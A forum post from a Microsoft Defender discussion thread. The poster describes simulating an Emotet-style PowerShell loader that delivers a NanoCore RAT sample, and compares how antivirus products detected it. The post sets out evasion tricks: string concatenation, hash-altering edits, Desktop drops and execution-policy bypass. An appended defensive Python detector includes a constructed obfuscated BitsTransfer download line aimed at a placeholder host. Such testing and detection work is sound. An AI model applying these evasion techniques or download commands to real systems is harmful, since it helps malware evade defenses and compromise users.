Microsoft Defender - pros and cons (November 2020)
ForgottenSeer 89360 wrote (post 914029):

The sample imitates an Emotet loader; in fact I got inspired by Emotet, which Microsoft claims to have blocked with a machine learning model in seconds... there was this sort of post on their blog, if I am not mistaken. Hope the Emotet team doesn’t come after me with copyright claims 😆

So I downloaded a malicious sample and uploaded it on a benign website (won’t disclose all details for security reasons). This way I bypassed web filter blacklists.

The Emotet loader simulator uses BitsTransfer (Emotet uses System.Net.WebClient) to download the malicious file and write it on the Desktop. Writing to the Desktop decreases machine learning sensitivity as opposed to writing in the temp folder or somewhere else.

To make things a bit more interesting, I used a hex editor to slightly modify the downloaded malicious file, which bypassed any reputation technologies. Finally, PowerShell executes the sample. To decrease machine learning sensitivity throughout the whole process, on the second sample I removed attributes such as hidden window, no exit and others.

I used a tool widely available on the web to obfuscate the code, just like the Emotet creators do. It hasn’t been encoded with base64 (unlike Emotet) but has been concatenated, which makes it human-unreadable and also bypasses signatures and heuristics. To bypass the execution policy, I ran the code as an argument, not as a script.

It took me less than 20 minutes to do all that, and the result: a few of them failed already. The malicious sample was a variant of the NanoCore RAT (known for its privilege escalation) and was successfully executed in all test cases. There was not even a UAC prompt.

Avast’s IDP kicked in and removed NanoCore, but wasn’t smart enough to correlate it to my loader. Defender and Malwarebytes did nothing. Kaspersky detected everything upfront (on VirusTotal); ESET detected the first one, probably due to attributes commonly used by malware. That’s on VirusTotal again.
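The post's observation that dropping the hidden-window and no-exit switches lowered detection rates shows how brittle a detection keyed on those attributes is. As an added example (not code from the post or the thread), here is a small Python triage routine over constructed PowerShell script-block text, in the form Event ID 4104 would record it, which folds 'a'+'b' string concatenations back together before matching the download-and-drop-to-Desktop behaviour, so the verdict does not depend on -WindowStyle Hidden or -NoExit being present.

```python
import re

# Constructed script-block samples (not from the post): one mimicking the
# concatenation-obfuscated BITS download to the Desktop described in the
# thread, with a placeholder URL, and one ordinary admin one-liner.
SAMPLES = {
    "obfuscated": "$a='Start-Bits'+'Tran'+'sfer'; & $a -Source "
                  "'http://example.invalid/f' -Destination "
                  "\"$env:USERPROFILE\\Desktop\\f.exe\"",
    "benign": "Get-ChildItem -Path C:\\Logs -Filter *.log | Measure-Object",
}

# 'abc'+'def'  ->  'abcdef'  (two adjacent single-quoted literals joined by +)
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
# Counts every quote-plus-quote join, so 'a'+'b'+'c' counts as 2.
JOIN = re.compile(r"'\s*\+\s*'")

# Behavioural indicators, matched against the folded (de-concatenated) text.
# Window-style and no-exit switches are deliberately not part of the verdict.
INDICATORS = {
    "bits_download": re.compile(r"start-bitstransfer|bitsadmin", re.I),
    "webclient_download": re.compile(r"net\.webclient|downloadfile|downloadstring", re.I),
    "write_to_desktop": re.compile(r"\\desktop\\", re.I),
}


def fold_concats(script: str) -> str:
    """Repeatedly join adjacent single-quoted literals until nothing changes."""
    prev = None
    while prev != script:
        prev = script
        script = CONCAT.sub(lambda m: f"'{m.group(1)}{m.group(2)}'", script)
    return script


def analyse(script: str) -> dict:
    """Return join count, matched indicators and a verdict for one script block."""
    folded = fold_concats(script)
    hits = [name for name, rx in INDICATORS.items() if rx.search(folded)]
    joins = len(JOIN.findall(script))
    # Download behaviour plus either heavy concatenation or a second indicator.
    suspicious = bool(hits) and (joins >= 2 or len(hits) >= 2)
    return {"joins": joins, "indicators": hits,
            "verdict": "suspicious" if suspicious else "benign"}


if __name__ == "__main__":
    for label, text in SAMPLES.items():
        print(label, analyse(text))
```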